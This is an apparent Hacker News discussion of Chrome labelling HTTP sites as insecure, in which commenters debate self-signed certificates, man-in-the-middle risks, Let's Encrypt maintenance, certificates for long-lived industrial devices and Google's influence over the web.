Sadly, medical and industrial "isolated networks" have turned out to be huge cans of worms. Never trust the network. Doubly so when you're faced against threats 30 years into the future.
Now how the hell do we create a webserver that will work reliably for the next 30 years if we have to embed SSL certificates with built-in expiration dates in the range of 1 to 3 years?
You can use self-signed certificates. Your clients will have to trust them (by updating their stores). That's hardly an ideal solution (deployment and security wise).
More broadly speaking, you can't rely on anything to stay the same in 30 years, in terms of infrastructure. Many companies therefore deliver both the devices themselves, as-well as the systems to control them (ie. custom laptops/tablets). More costly for everyone involved.
If your clients trust the self-signed certificates (by updating their certificate stores, adding up a self-signed root CA), then, as of today, as far as I'm aware there won't be any warnings. No guarantees that this situation won't change further down the road.
I doubt there'll be any warnings. Otherwise Chrome wouldn't work in company networks. If you have domains that are just available internally (not even on public DNS), self signing is the logical solution. Still provides you with the advantages of encryption.
Sidebar: Why are you looking at web technologies if you aren't expecting to make any updates for 20-30 years? Is the interest for speedier development?
Welcome into web compatibility world - lot of companies do nice buck out of its quick evolution. And this is very, very good thing for you too if you play it well.
For internal use the answer is self-signed certificate. However I wouldn't count on web browser based software compatibility to last even 10 years. I think browser vendors at some point will decide to ditch <512-bit certs or some encryption scheme and one needs to make a cert/server upgrade. Some option may be Firefox ESR [0] requirement to ease an adoption.
Moreover browser is UI part of your solution and you need to define some requirements - this should be all right for well administrated environments. If the user for any reason upgrades/changes the browser but not your device then this is user introduced incompatibility. Your EULA should cover that. Also you should send notifications or just show some message in device panel to your customers that they need and upgrade if they want to use given browser past version X.
Customers need to learn that web means edge tech and that needs frequent upgrades. Their isolated internal network of the past e.g based on WiFi WEP would be practically a network open to bad actors today.
Actually, in industrial environments that seems like the perfect choice.
Over 30 years, you'll find vulnerabilities in pretty much anything; so you don't want that device on an open network anyway. But, you can put it on an isolated VLAN, configure it so that it's accessible only by that proxy and no other computers, and then all the http traffic is in the isolated part, and the users access the proxy through https.
I'll be honest, I've never set up the thing I mentioned, but it sounds vastly less error-prone than writing some certificate update support (likely written in C/C++) that writes the certificate bytes directly to the devices.
Initial can-of-worm questions are "who's allowed to update the cert?", "how does the device authenticate the person updating it?", "what's the failure mode if an update goes wrong?", "how long shall we test the new cert-writing-module?", "will the customer even bother after the initial certs expire we install for them and instead just tell their users to flip the Chrome flag?", "how do we also update TLS and crypto libraries to support future certs or standards?"
>Our clients run these devices for a long time. 20 or 30 years are not unheard of.
Have you actually had clients run those html/js based devices "for 20 or 30 years" (e.g. have some running since 1997) or is this a totally hypothetical scenario?
About a month ago I attempted to restore a DOS-based industrial HMI panel that we shipped mid-1995. The 2 MiB of proprietary custom 72-pin SIMM flash memory had gone corrupt, and neither us nor the panel's OEM possessed the original software for restoration. We did have a later version of the software from 1997, but it needed a whopping 4 MiB to install. The machine was in active production until about two years ago, according to the customer.
I fully expect most of the systems that we are shipping now to be run for the next twenty years as well. Until security issues start losing customers buckets of money, they're not going to care one bit.
Heavy industry is concerned only with keeping their production lines up and running. They will do amazing and scary things if it helps them keeping production up. These people have absolutely no idea of security or even IT. They want to bolt and wire devices together so that they work. All the cool tech hidden inside is way beyond their understanding for the most part.
>*
About a month ago I attempted to restore a DOS-based industrial HMI panel that we shipped mid-1995. The 2 MiB of proprietary custom 72-pin SIMM flash memory had gone corrupt, and neither us nor the panel's OEM possessed the original software for restoration. We did have a later version of the software from 1997, but it needed a whopping 4 MiB to install.*
Sure, and there are COBOL systems running since the 70s. But I asked for such an example in web technologies. The one described above isn't.
>I fully expect most of the systems that we are shipping now to be run for the next twenty years as well.
It is still not unreasonable to believe that such systems exist, and those systems will become more prevalent over time. An EtherNet/IP-controlled servo drive with an HTTP configuration page installed in 2008 will likely still be running in 2028.
> All kinds of things can change or be deprecated.
That's cute. If you truly believe a simple declaration of deprecation will stop the use of something, I have some oceanfront property in Afghanistan to sell you.
Our customers do indeed run devices from us and from competitors for decades. These lifespans are normal and expected. We currently manufacture and sell devices that have been developed 10 to 15 years ago with virtually no changes.
Internally, we have a push to transition user interfaces for future products to HTML/JS over HTTP. This was sold to our management as a solution with long term stability.
Networks which use the private network address blocks are not necessarily trusted networks (consider open Wi-Fi hotspots). Also, private networks do not necessarily use private network address blocks—intranets frequently use publicly-routable IP addresses where possible, as it simplifies linking physically distinct intranets. With IPv6 eliminating the scarcity of public addresses we can expect this to become much more common, even among home users.
The fact that the IP address is publically routable does not imply that the server is actually reachable from the public Internet—that depends on the firewall.
You can associate public hostnames with private-range IP addresses as well, and obtain certificates for them. The main point was that the use of private, non-routable IP addresses does not imply that the network is trusted, and thus is not sufficient reason to exempt the server from securely identifying itself.
So don’t use Chrome 68. Use whatever version you have now. Since you clearly aren’t intending to update anything for “30 years,” then it shouldn’t matter. If you were intending on keeping systems updated, could you reasonably depend on a web browser developer keeping things constant enough for 30 YEARS? If it’s a closed system, you control everything right? So use what works now.
The parent may not be able to dictate the browser compatibility, actually. Customers will use whatever they want, and if it don't works then they'll just 'whine' to the commercial next time he tries to sell them something. Do this too much and it's a recipe for disaster.
Our clients are unwilling to update device firmware, not us. They will happily upgrade their usual IT infrastructure over time, though. So we cannot realistically dictate browsers or browser versions.
Of all the complexity and unknown that are embedded in projects with decades of lifespan, for this one in particular the solution is quite straightforward: roll your own certificate authority and relative certificate distribution and deployment scripts.
This only works when SHA256 certs will be supported for 30 years (which I doubt it won't sustain the next 30 years..)
I know plenty of devices which can't be used correctly any more since SHA1 + SSLv2/SSLv3 was deprecated and they generated a CA+Cert with 512/1024 Bits.
And then we'd have to tell our clients how to add the root cert to their browsers and operating systems. I doubt that this would fly with many customers.
I'm glad this is happening, although I'm more excited for the day when they start very obviously marking password input fields as "NOT SECURE" when they are used on HTTP sites. Although I am genuinely surprised how much Google and others like Mozilla have had to drag many site owners kicking and screaming into HTTPS. I never would have imagined that end-to-end encryption by default would be consitered "controversial".
Also, those HTTPS numbers are amazing!
* Over 68% of Chrome traffic on both Android and Windows is now protected
* Over 78% of Chrome traffic on both Chrome OS and Mac is now protected
* 81 of the top 100 sites on the web use HTTPS by default
> Although I am genuinely surprised how much Google and others like Mozilla have had to drag many site owners kicking and screaming into HTTPS
Personally i am very concerned about how much power Google has over the web - all it takes to change millions of how web sites work and look like is a random decision by Google.
What bothers me even more is that most people do not seem to care much because they happen to agree with what Google is doing (so far). However i think that sites should make decisions on their configuration, layout, mobile friendliness and other things because they want to, not because they are forced by Google through taking advantage of their position and biasing what people see towards what they believe people should see.
I do not like that Google basically dictates how the web should behave.
(actually it isn't only the web, but also mail - just recently i had a mail of mine end up in the spam folder of someone else's GMail account because who knows what of the 1983847813 things i didn't configured exactly as Google likes it in my mail server... and of course the "solution" that many people present to this is to hand all my communications to Google)
> However i think that sites should make decisions on their configuration
It's OK when they have ideas what they are doing, but that's not always the case.
Before my trip to Kaua'i I googled some dive shops on the island to book a scuba diving trip. Every dive shops on the island seems to be using the same vendor to process online order of the reservation, which has the same form to input credit card number, and has some text around it saying "it's secure". They are not secure. They are on HTTP: https://twitter.com/fishywang/status/895133987525476354
Agreed that in situation like this it's near impossible to ascertain that iframe target wasn't altered, unless you already somehow know what it was before you got mitmd.
Yeah, that’s a little better but can’t an attacker inject something in the surrounding the age that compromises the iframe? Or even rewrite the iframe to use a proxy under the attackers control?
Maybe the vendor improved since then (it's still not very secure as others and Chrome pointed out), but I remembered that back last Aug I searched for "https" in the source code and that's not the case.
This is possible because how ubiquitous the idea of HTTPS-all-the-things is now, not the other way around. Further, HTTP IS insecure(the S literally means secure) so...
I feel the push to HTTPS is bike shedding. It solves a problem, but it's not a big problem.
Most people don't need HTTPS for most sites. I think it's safe to say most security and privacy breaches are due to poor practices on the back end or by end users.
Man in the middle attacks are more common than you'd think. Many corporate networks inspect outbound network traffic. I've heard of some coffee shop WiFi spots that also modify traffic to inject ads. Having someone tamper with your traffic, is a big deal. Especially consider many websites people visit are sensitive in nature, e.g. Google almost certainty knows more about me than any other human being -- they might even know more about me than I know about myself.
Most corporate networks are going to inspect or block HTTPS traffic too. They have security and regulatory compliance concerns, and consequently deploying tools capable of intercepting that traffic is pretty much the norm these days. It's all but certain that if you have a work PC then your contract/handbook/etc. states that this may happen, unless you're in an area where the legal basis for this sort of inspection is weaker.
Protecting people who aren't at work but are using a potentially hostile network (public WiFi, etc.) from their own device is certainly a legitimate concern.
Of course, this is a feature in certain contexts: I’d love to be able to inspect all the traffic going in and out of my home network and possibly even modifying it at the edge device.
I've inspected my own HTTPS traffic a number of times using it including e.g. traffic from e.g. iPads where my Desktop was effectively acting as "the edge device". Of course, this is more for debugging than aggregate statistics/monitoring...
This won't let you inspect traffic secured via certificate pinning without additional reverse engineering to figure out how to replace the pinned cert, but it'll work fine for vanilla HTTPS / generic CA based stuff (e.g. all browser traffic.)
> This won't let you inspect traffic secured via certificate pinning without additional reverse engineering to figure out how to replace the pinned cert
Replacing a cert doesn't get around cert pinning. That is the exact use case that cert pinning protects against.
It appears you're talking about pinning in browsers only, so I'll address from that perspective only.
For public certs: Yes, but that would only produce the desired effect if the site hadn't yet been pinned, and this was a first connection, or in the case of the pins having expired. In other words, the pinning can only be stripped out if there is no pinning already in place on the client.
However, this will soon be a moot point, as Chrome removes pinning in favor of cert transparency. This will reopen this security hole in browsers simply trying to be secure within captive portals and other insecure networks. Tor has pinning that would extend from inside the portal to outside, so that may be one option, but I don't yet know how sturdy that is.
Firefox at least will disable pinning if it sees a certificate signed by a user-supplied CA, on the one hand to facilitate this kind of debugging and on the other because otherwise enterprises using MITM boxes wouldn't be able to use Firefox. I suspect Chrome does too.
That's simply not true. 99% of the time I could care less if a middle man sniffs my traffic. HTTPS is for that other 1% of the time.
The hypocrisy here is amazing, too, because while pushing HTTPS, Google itself is actively following everybody around, tracking everything they do online.
The obvious one is that it makes your traffic hard or impossible to sniff.
What's often overlooked is that it also makes your session highly resistant to tampering by 3rd parties. These parties include:
1. Anybody who might have access to your home WIFI network.
2. Your Internet Service Provider. There's been plenty of documented cases where ISPs have injected 'harmless' HTML.
3. Any number of bad actors if you're using any kind of public WIFI.
4. National actors. That's the NSA in the United States, where we have clear evidence that they have been capable of intercepting unsecured connections and injecting unreleased attacks into targeted computers.
This is not tinfoil hat stuff.
The benefit of https is undeniably greater than the cost.
I'm not crazy about how Google throws their weight around in a lot of cases either. But in this case, I think they're doing the right thing.
1 and 3 are due to poor end user security and won't be solved by HTTPS, and 2 and 4 are lost causes and also not solved by HTTPS.
An ISP is by definition a man in the middle, and unless the user checks certificates for every page and resource they fetch then the ISP can inject their own certs and monitor traffic if they really want to.
And most of the time national actors like the NSA will have better ways of getting the information if they need it
An ISP could inject their own certs very easily. Send an email to customers -- here run our "tune up" app to speed up your computer. A huge portion of customers would probably do it. Bingo, new CA roots installed.
In that case the ISP would be inducing the user to install malware. If the ISP is willing to do that, then you should probably view them as malevolent adversaries in your security model. I don't really think that an OS can protect against this in any reasonable way if that OS allows users to update certificate stores themselves. I don't really view this as a problem with the certificate model as opposed to plain old social engineering.
In any case, I don't think "an ISP could inject their own certs very easily" is a fair characterization unless you put it on the same footing as "anyone with your email can get people to install malware easily".
I'd like to see something comparing the number of people blackmailed or exploited by sniffed HTTP traffic versus the number of people affected by back end exploits or social engineering. Everybody screams about HTTPS because it's easy to do, but it's a tiny problem in the grand scheme of things, and it gives people a misplaced sense of security.
To be fair, there's not much that browser makers can do about back end exploits and social engineering. Google aren't in the business of writing back ends for third parties, and it's difficult to know if a website's back end is insecure, so I don't know who you expect to hear "scream", or who they would scream about.
The article is about one practical measure that a browser maker has taken to improve the piece of user-facing software that they are responsible for, and some users of that software are applauding this improvement.
Having said that, I do accept your over all point that there is a lot of other work that still needs to be done in securing the web. As you suggest, that's not going to be easy, but let's not fail to fix the things that we can fix already.
It's not a big problem if the traffic is inconsequential.
If I'm passively browsing I don't really care too much. If I'm submitting forms, or working in a authenticated session, that's a different matter of course.
And as easy as it is to get a certificate these days, what does it really prove? It stops 3rd party snooping, but then again so does a self-signed certificate.
I think you're confusing authentication vs encryption. If you were MITMing someone and using a self signed cert for example.com that connection can be encrypted (if the user clicks through the warnings) but says nothing about your trust for the site.
Let's Encrypt, or any other low-cost SSL certificate, says very little about my trust for the site either. It's just too easy to get them to think they really mean anything.
All new certificates for DNS names in the Web PKI today (and for some time now) must result from the CA having used one of the Ten Blessed Methods to validate the Applicants control over the name, regardless of who paid how much.
Let's Encrypt offered three of the Ten, but one was discovered to be flawed due to the way some major bulk hosting services are configured, so that leaves two (of Nine, since in practice any implementation of the Tenth Blessed Method is flawed the same way).
Even flawed Blessed Methods are far superior to the checking (basically none) we can reasonably expect from a normal person using a web browser. But still, improvements upon the Blessed Methods are a topic of public discussion, if you think you genuinely have a better way you should definitely let the CA/B Forum or m.d.s.policy know about it.
Having any valid cert (DV or otherwise) proves that you are viewing the example.com that the owner of example.com wants you to see. Without a certificate, you can/will be MITMed.
>It's just too easy to get them to think they really mean anything.
I'm not sure what you mean by this:
1. Are you saying that there is a vulnerability where you can get a valid certificate for a domain you don't own?
2. Do you mean the fact that valid owners of a domain can get a certificate easily?
If 1, please provide more info. If 2, why is that a bad thing?
I agree. Nobody is attacked using MITM, which is the only thing HTTPS prevents. Most credential leaks are due to insufficient security at the server, not the connection.
If the connection were HTTPS they could simply block it or redirect it wherever they want to give the same message. An ISP will always be able to MITM the connection.
You can't redirect HTTPS traffic unless you have a root certificate or have the private key of the site, and blocking HTTPS traffic would make at least 68% of web traffic not work, so not a real option.
Exactly. It will show up in any modern browser with a big red "This site is not safe!" type of message if that was to happen. This is one of the reasons Google (and others) so proactively protect the certificate infrastructure so meticulously, and run efforts like https://www.certificate-transparency.org/
It's not important at all for most people. How many times have you been MITM'd? I'll tell you about me: zero. Nobody cares enough about me to do that.
You know what people get bitten by? Hacked servers where the whole website is under a phisher's control or malicious website which downloads malware to your machine or sells your data (eg, Google, Facebook).
Maybe my knowledge is lacking, so please tell me what those 4 things are that you're being so elusive about. I suspect they are also as unlikely as MITM.
I've been MITM'd numerous time in the past. I've been MITM by corporate netorks filtering my traffic. I've been MITM'd by scummy and public wifi hotspots trying to inject ads. My own domain provider once MITM'd my domain in a weird attempt to tell me my domain was expiring...
I'm not trying to protect myself from a targeted attack. I'm trying to protect myself from the enormous amount of scummy behavior in this whole industry. When I connect to my bank, I want my data to be secure not only against malicious activity, but negligence and incompetence. This is the threat model that HTTPS-Everywhere protects against.
Sure, people get bitten by viruses and phishes. But let's fix things one step at a time.
> When I connect to my bank, I want my data to be secure not only against malicious activity, but negligence and incompetence.
What bank do you use that doesn't use https already? Maybe it's time to change your bank rather than force every website in the world to switch to https.
Of course my office pushes a root certificate to all the devices and Skype for Business breaks unless you’ve trusted that certificate to handle SSL traffic.
> It's not important at all for most people. How many times have you been MITM'd? I'll tell you about me: zero.
How do you know? What is your groundless, evidence-free assertion worth to you?
> Nobody cares enough about me to do that.
I have detected Firesheeping on coffee shop networks in the past. Guess somebody cared about all the people in there, huh?
The conflation of Google using information collected about you in aggregate to provide advertising services and man-in-the-middle attacks on clients is dishonest, disingenuous, and at this point downright malicious. Stop.
Are you proposing that Chrome drop the security warning if it detects that the user is visiting a site that only has cat videos or blog posts on? Do you realise that people have been arrested for writing blog posts?
You may be lacking SPF, DKIM or DMARC records. The lack of these records is a very reliable way to detect spambots that forge the From: field, so many mail sites now spam these by default.
I do agree with you - it is appalling how much power Google has. I think a bit of perspective is helpful, though.
There hasn't really been much of a span where there wasn't a de facto 900 Lb gorilla browser that threw its weight around. I think a lot of us watched this happen, but the various charts on this page are instructive:
It appears that somehow the browser market trends toward an unstable near-monopoly of sorts, at least so far.
So, meet the new boss, same as the old boss. At least https everywhere is a long-term public good that they're willing to take grief over forcing. It beats some of the other unilateral changes various once-dominant browsers forced.
The complexity of the web platform is at least party to blame for this. The specifications for HTTP, HTML, DOM, CSS, JavaScript together are gargantuan and growing even further every year. This makes the development of Chrome's new competitors and the maintenance of already existing browsers extremely expensive, and it also hinders cross-browser compatibility of web applications as every browser fails to implement the monstrous specs flawlessly in its own unique ways.
We are luckier than we deserve that Mozilla exists. If it was necessary to re-implement a modern Web browser completely from scratch today, it would probably take someone with the level of commitment of Richard Stallman to make it happen.
Search engines and browser vendors have had a big influence on configuration, layout, mobile friendliness and other things long before HTTPS All The Things started to gain traction.
It's not random and that it just might serve security is a side effect.
It is about competitive advantage over other Ad Networks which might not implement HTTPS for AdSense. It is about raising both monetary and technical cost of server setup to make Google Cloud offer look even cheaper. It is very self serving.
Probably the dozens of various DNS, DKIM, SPF, SMTP behavior config, non-consumer-IP, etc., etc. boxes that must be ticked just right in order to not be considered a spammer these days. It's very difficult to get it all correct enough to keep a significant portion of the email sent through your SMTP site from being considered spam by mainstream email providers such as Google.
I can confirm that this is a giant pain in the ass. I use a non-standard address scheme (instead of the plus character as a tagged-address delimiter, I use the qmail approach, a dash character), so I can't easily move my domain to GMail. I occasionally end up in spam folders for reasons I can't discern, despite years of puzzling and discussion with a number of experts.
The especially frustrating thing is that there's no way to find out why you've been binned. Even my friends who work at Google can't find out for me, much less get me whitelisted.
It's very difficult to get it all correct enough to keep a significant portion of the email sent through your SMTP site from being considered spam by mainstream email providers such as Google.
This doesn't change the problems of unreliable email because mail services are too aggressive, unfortunately.
We recently got a bounced mail (not dumped in a spam folder, actively rejected) from a major university, telling us that the message looked like unsolicited bulk mail. The message was sent directly to a specific single customer in response to a purchase they had just made, contained information that we were required by law to provide to them, and was sent from a reputable host with things like SPF properly set up. That is simply broken, and it is 100% the fault of the mail service admins at the university.
If it was just the occasional small site it would not be such a problem, but even iCloud (Apple) and Outlook (Microsoft) get it wrong with some regularity from hosts that check all the right boxes.
Required maintenance for a simple, static http site: none.
Required maintenance for a simple, static https site: configure let’s encrypt and keep the cron job running.
Big difference? Not for some, but it sure is something that offers very little value for very many site owners. Even the top 100 sites are only at 80% https by default, and they do it for a living!
>it sure is something that offers very little value for very many site owners.
Because it's not meant to offer value for a site owner, it's meant to offer value to the user.
When I type a password on your website, I'm the one that has the most to lose there. When I type my credit card or other personal information into a site, I'm the one that will need to spend time and money getting control of my information if it was stolen.
When I am browsing the web and ads are being injected into the HTTP request, or my ISP is dragnet datamining, or a compromised router is injecting malware into every page, I'm the one that loses, not you.
The argument that an insecure website is easier to maintain than a secure website is like saying "a car without airbags is easier to work on". The extreme vast majority don't care about how easy it is to maintain the site, they care about their privacy and security.
And your counterpoint is needing to download and run some open-source software once a month (or automate the process and never touch it again). A few years ago that would have been a much larger list, but developers were listening to the complaints, and realized that the only way to a fully secure web was to make this process easier, so they did!
It's easier than ever to enable HTTPS on every website, and in the vast majority of cases it's a net improvement for users.
I think you misunderstand. An ad-free website served over HTTP can (and does) have ads injected into it by someone along the way. And not just ads, but malware as well.
And privacy of information going from your browser to the internet is only half of the equation. What about privacy about what you are viewing?
I don't want every single router between my computer and the server knowing the full contents of the pages I'm choosing to view, or building advertising profiles on my habits, or even knowing what device type, browser, OS, and more I'm using.
Would a self-signed (I'm not sure this is the right terminology) cert be sufficient for this?
That way if someone MITM'd you, you would see that the cert changed, right?
But I guess if the path you use to the website is always the same, then if they MITM'd you the first time you accessed it, you wouldn't be able to tell?
Hmm, I guess that probably isn't enough then.
Is there really no good way to serve public information from a website that doesn't require periodically updating one's cert, and without risking MITM'ers changing the content?
I guess if the client already has the hash of the content, but that isn't very convenient.
The problem with self-signed certs is that you're then given no assurance that you're not being MITMed. An attacker could be stripping the real SSL off a connection, re-encrypting it with a self-signed cert they've created, and then showing that to you. Real SSL certificates have trust chains, which aren't used in self-signed certs.
Let's Encrypt has to use one of the Ten Blessed Methods to validate control over the name they issue for. Unlike a random person out on the Internet, doing that validation is their actual job, so they're pretty good at it, and the Ten Blessed Methods tell them what constitutes an acceptable means of doing so.
These days Let's Encrypt uses a "multiple view" approach in which more than one physical location in the world hosts Let's Encrypt systems (although only their US West Coast location contains the actual CA) and so they can check that things appear the same from more than one angle, you can't just take over the ISP they're getting service from in California and leverage that to get anything you want. If the views don't agree (e.g. you pass a Let's Encrypt validation from Paris but not from San Francisco) then your application is denied automatically.
Now, the next layer above is also interesting. Who checks Let's Encrypt and other public CAs are doing their job? Fortunately Mozilla are on the case again, all major Trust stores say they enforce the Baseline Requirements which explain how a CA should do its job, but all except one make decisions entirely in private. Or maybe they just bin all the complaints if the CA pays them a bribe? Who knows. Mozilla acts openly in public, you can (and indeed your insight might be valuable, so please do) help oversee the Web PKI in their m.d.s.policy group.
Assuming cert pinning is saving the information from the first time it is accessed, that is sort-of what I was imagining for part of what I was saying.
True. But why should the website owner do something about it? It's a crappy network the user is using. The same crappy network could strip https and then inject ads.
No, a properly setup site cannot have it's HTTPS stripped, and even if it could it is the browsers job to warn the user that they site they are on is insecure regardless of why it is that way.
Problem is that browser warnings are sometimes false. Self signed certificates are not unsecure, the underlying encryption is still the same. The "unsecure" only applies to the CA, but that is not clear in the warning.
>Problem is that browser warnings are sometimes false. Self signed certificates are not unsafe, the underlying encryption is still the same.
Browser warnings aren't false, you're reading of them is false. Read around on badssl.com [0]. The self-signed warnings in chrome say:
>Attackers might be trying to steal your information from self-signed.badssl.com (for example, passwords, messages, or credit cards).
And when you click advanced chrome says:
>This server could not prove that it is self-signed.badssl.com; its security certificate is not trusted by your computer's operating system. This may be caused by a misconfiguration or an attacker intercepting your connection.
It says nothing about the encryption being bad, I don't know where you got that from. What it does say is that Chrome has no way to validate that the site you are going to is actually the site in the address bar. Encryption is pointless if anyone and everyone knows the password (oversimplified, but you get the point). Encryption without Authentication is as secure as normal HTTP.
Because of the term "unsecure".
Also Chrome says "This is not a secure connection". Emphasis on "connection". Which implies encryption (on that connection) being not secure. Which is wrong. What happens on the site itself is a layer above.
>Which implies encryption (on that connection) being not secure. Which is wrong.
No it is not wrong, even your confusingly worded sentence there is still fully correct.
Security (or encryption, or any other synonym you can come up with here) is made up of 3 (well technically 4) parts:
* confidentiality
* integrity
* authenticity
* (and technically non-repudiation, but that doesn't really apply here)
self-signed HTTPS certificates only provides 2 of the 3 (confidentiality and integrity) and it's that last one that is most important (authenticity), because without it you don't know who you are talking to. It could be your website, or it could be some asshole down the street pretending to be your website, you have literally no idea.
You say it's misleading, but it is you that is misreading and misunderstanding the concepts. Encryption without authentication is like encryption without a password. Utterly pointless.
The browser is implying that AES on that connection is unsecure. A better would be "might be unsecure". Because even if it's self signed, there is a possibility it's still the correct certificate.
Yes, because AES in that configuration IS INSECURE!
Just like my analogy, AES encryption with a password of nothing is "unsecure", and no matter how much you try to argue that it's still perfectly secure, you are wrong..
Just like this, the AES is pointless when ANYONE can set the password (or in more correct terms, when anyone can create one with the user in a DHKE). If you can't tell that the server you are talking to is actually the server you meant, then AES does fuckall, because the man-in-the-middle is the one that is setting the password!
You are doing the equivalent of telling me how secure your new house door lock is, while wiring it up to always unlock when someone rings the doorbell... All the security in the world won't help you when you give everyone a way to bypass it instantly.
Only if you verify that it is the same cert before you visit the page.
Luckily browsers will show you the warning saying that page is insecure, and give you the option of going there anyway after you have validated that the cert is the same.
But it's not only if you use a shitty ISP. It's if any hop between you and the server is being shitty. And only 1 or 2 of those can you control as the user.
Having spent four months in a hospital, it isn't just "ISPs" who are the problem.
Rather than the hospital supplying any kind of proper authentication, they MITM the first connection to their WiFi, and logged your IP address as your user. They also required you refresh that connection every half hour or so.
There are a lot of people doing things in really bad ways.
We can't fix all of them, and often we don't have a choice about interacting with them.
Required maintenance for a simple, static https site: Install certbot, press enter a few times, forget about it.
"keep a cron job running" sounds like it you're running the cron job by hand.
>Even the top 100 sites are only at 80% https by default, and they do it for a living!
That's entirely separate from your "simple, static site" example and yes, rolling any sort of large change out to a big site is a big deal, and if there isn't business motivation to do it it likely wont happen. Google is providing everyone a business motivation by threatening to point out to users that insecure sites are insecure.
> "keep a cron job running" sounds like it you're running the cron job by hand.
Cron jobs fail sometimes. You have to monitor them, investigate why they failed, fix the issue, and rerun them.
Web servers fail, too, but with shared hosting, it's mostly not your problem. And shared hosting providers are still trying to charge an arm and a leg to manage SSL certs for you (because it's a nice high-margin business for them).
And spying/surveillance/analytics/snooping. That's not minimal. And you get all those benefits from checking a checkbox in cPanel and the rest is handled automatically? Who could be against that?!
There's shenanigans like "grnail.com" pretending to be "gmail.com" which bigger and much more expensive certs prevent against. But the benefit of https that doesn't prevent against this is still very high
1. You don't have to monitor your cronjobs. They'll send you an email when they produce output.
2. Let's Encrypt will send you an email if your certificate is going to expire in a month. This will normally never happen, since it is continuously renewed.
> 1. You don't have to monitor your cronjobs. They'll send you an email when they produce output.
You now have to configure e-mail on your small server to actually work (and not get immediately eaten by spam filters of your personal e-mail provider).
If you have a simple static site, you can have Google's Firebase hosting thing do the HTTPS for you, without management, for free. Netlify[1] is another one I see recommended around here decently often which has the same service.
If you are running your own webserver even a static simple site has required maintenance. You need to keep the server and OS patched. So adding a letsencrypt cron job is not any worse than configuring something like Debian's unattended-upgrades.
But I don't think most site owners should be doing even that much. They should just pay for static hosting, which is cheap and ensures somebody else will keep the server, os, and cert all safe.
I added https to my static site last year and it has been a huge waste of time.
ubuntu + nginx worked fine for years without much maintenance, but I've spent so much time reconfiguring things when something breaks (and it is really clear when something a renewal fails... thanks HSTS).
Things that used to be simple, like putting setting up a subdomain (need to get a new cert and reconfigure the cron job now) or pointing at a websocket (can't point directly at node since that's not secure, needs to pass through nginx now) consistently take hours to do now.
I mostly do data analysis and front end work; mucking around in nginx config files is something I would have been happy never experiencing. It sucks that it's harder to host your own website now.
I have nginx fronting around 15 different (very low traffic) websites (most static, a few python), all of which have Let's Encrypt certs. The required additions to the nginx conf were minimal and easy. Adding a new subdomain is trivial. Fetching the initial certificate from Let's Encrypt is a short, easy command line. And "sudo certbot renew; sudo /etc/init.d/nginx reload" in a cron job keeps the certs up to date (the "renew" command is smart enough to go through the list of certs you have and renew them all).
It's really hard to imagine it getting much easier.
You don't actually need to keep web servers serving static content patched. Simply close all other ports, run a minimal web server, and it's a tiny attack surface. Some of these have made it 20+ years with zero maintenance.
I use cloudflare for my static website so that https is seen by the browser even though I am serving http.
Advantages are that it is free and zero maintenance, however nation or network providers can intercept between cloudflare POP and my server. I'm ok with that for my situation.
As a website visitor this has always bothered me. HTTPS used to mean that I had an encrypted path between my browser and the server actually serving the webpage. With Cloudflare allowing this weird hybrid mode, I can never actually know if the connection is secured all the way end to end.
cloudflare didn’t invent this or make it normal. It’s always been common to terminate https in front of your “actual” server and with re-encrypt to the “actual” server or (very common) ... don’t.
Cloudflare may have made it more common for the most basic kind of site (with their easy setup and free tier) but at the same time most of those sites probably didn’t use https anyway.
The reasons this has been done are performance (specialized hardware/separation of concerns) load balancers/firewalls needing to decrypt to route/enforce policy (that doesn’t need to imply termination but it often goes hand-in-hand) and protecting keys from your app server (think of it as like an HSM - if your app server gets compromised you probably don’t want the TLS private key to be leaked. Again you could reencrypt with a different key but often this hadn’t been done.)
The threats for last mile network fuckery (e.g. consumer ISP) are quite different then on the backend. Google has to worry about nation states messing with their networks and so they’ve had to reengineer end-to-end encryption within their network. As an end-user you just sort of need to accept that this isn’t within your ability to control or know.
Sure but the GP made a much stronger claim that they previous knew that it was the “actual” server terminating HTTPS.
Even still, the difference between this and e2e encryption isn’t something an end user is really equipped to evaluate IMO. The threat model is practically different vs e2e no-encryption.
Cloudflare also supports reencryption over the net which is useful if your hosting provider supports HTTPS but not via a custom domain (e.g. Google clouds GCS (S3))
No, I didn't make that stronger claim; if that's what it sounded like, I apologize for the poor wording. I was definitely assuming "terminate TLS at load balancer and proxy in the clear over internal, private network" as a common, long-established practice that I have no problem with.
With services like Cloudflare, you can terminate TLS at CF, and then proxy over the public internet to the server that actually serves the page, which I think defeats a lot of the purpose of TLS, and I can never know ahead of time when I request a page of HTTPS if this will in fact be what's happening.
If you truly have a simple, static site, the required maintenance should most of the time be exactly the same: pay your hosting provider, nowadays they should be providing HTTPS.
Then yes, you pay the maintenance overhead for doing so. I do it too, since I want to mess with these things and run things I can't easily run on shared hosting and if I'm taking care of a server and HTTPS for it anyways adding another site isn't much effort, but for just a static site it's overkill most of the time and kind of "your own fault" if you make it harder on you than it is.
That said, using certbot made it so painless I just started doing it at some point for everything I run and I only once had a small hiccup configuring a renewal-hook.
The English government (well, they're the British government, but they don't get to set building rules for the bits of Britain that aren't England) didn't think fire sprinklers were necessary in big tower blocks and schools. Too many regulations you know, it hurts the economy.
Then not just one but two huge tower blocks in London burned down. So how about that, suddenly maybe tower blocks _did_ need sprinklers after all. Shame about all the dead people.
Then use a provider that makes it easy. My point wasn't that it's easy everywhere, just that for simple static sites you can just use a provider that makes it easy for you.
A small static site I operate recently got HTTPS with zero action on my part. My hosting provider just did it of their own initiative and notified me that it was now done. I suppose they're going to do whatever ongoing maintenance it requires.
How do I run that cronjob on a simple, static site? I very deliberately create static sites and store them on e.g. s3 to be served without any effort on my part. I do not want to have to run a 24/7 server just for a monthly cronjob!
>I'm glad this is happening, although I'm more excited for the day when they start very obviously marking password input fields as "NOT SECURE" when they are used on HTTP sites.
Maybe Chrome would be up for it at some point in the future as HTTP form submissions become rarer, though I don't know how they made this decision.
Edit: Amusingly, even though I normally use Firefox, I haven't noticed this UI element recently because I'm so conscious of HTTPS—working on Let's Encrypt and support for it—that I rarely even try to enter information into a non-HTTPS site in the first place. :-) (so I might not be quite the target audience for this notification)
> I never would have imagined that end-to-end encryption by default would be consitered "controversial"
The whole point of Google's https crusade is to secure users from ISPs profiling their browsing activity, which for them is about eliminating the competition because they still monitor and track everyone and so if they knock the ISPs out they solidify their monopoly position.
HTTPS is not bad but Google's motives (in the context of their business model and monopoly position) are and that gives some people pause.
> The whole point of Google's https crusade is to secure users from ISPs profiling their browsing activity, which for them is about eliminating the competition because they still monitor and track everyone and so if they knock the ISPs out they solidify their monopoly position.
